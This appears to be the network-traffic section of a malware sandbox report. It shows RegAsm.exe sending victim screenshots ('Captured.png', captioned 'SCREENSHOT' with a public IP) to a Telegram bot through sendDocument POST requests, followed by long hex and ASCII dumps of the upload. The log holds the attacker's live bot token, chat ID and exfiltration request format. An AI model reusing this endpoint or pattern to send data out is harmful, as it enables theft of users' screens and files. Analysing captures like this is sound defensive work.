                                                                            22192.168.2.449781149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:54 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd332c38e45a80
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695477
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:54 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 32 63 33 38 65 34 35 61 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd332c38e45a80Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:54 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:38:54 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:54 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:54 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:54 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:54 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:38:54 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:38:54 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:38:54 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:38:55 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:55 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            23192.168.2.449794149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:56 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd336822cbc6ad
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695477
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:56 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 36 38 32 32 63 62 63 36 61 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd336822cbc6adContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:56 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:38:56 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:56 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:56 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:56 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:56 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
